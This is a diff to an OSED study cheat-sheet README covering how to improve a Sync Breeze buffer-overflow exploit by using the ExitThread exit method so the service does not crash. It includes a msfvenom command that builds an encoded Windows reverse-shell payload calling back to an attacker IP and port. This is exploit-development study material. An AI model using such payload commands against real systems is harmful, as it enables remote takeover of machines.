peterkhe1999/CheatSheet/OSED/README.md

 ## Improving the Exploit

-Following its execution, the default exit method of a Metasploit shellcode is the **ExitProcess** API.
-This exit method will shut down the whole web service process when the reverse shell is terminated, effectively killing the Sync Breeze service and causing it to crash.
+The default `exit` method of a Metasploit shellcode is the **ExitProcess** API - will shut down the whole web service process when the reverse shell is terminated, effectively killing the Sync Breeze service and causing it to crash.

-If the program we are exploiting is a **threaded application**, try to avoid crashing the service completely by using the **ExitThread** API to only terminate the affected thread of the program.
+If the program we are exploiting is a **threaded application**, use the **ExitThread** API to only terminate the affected thread of the program.

 ```bash
 msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"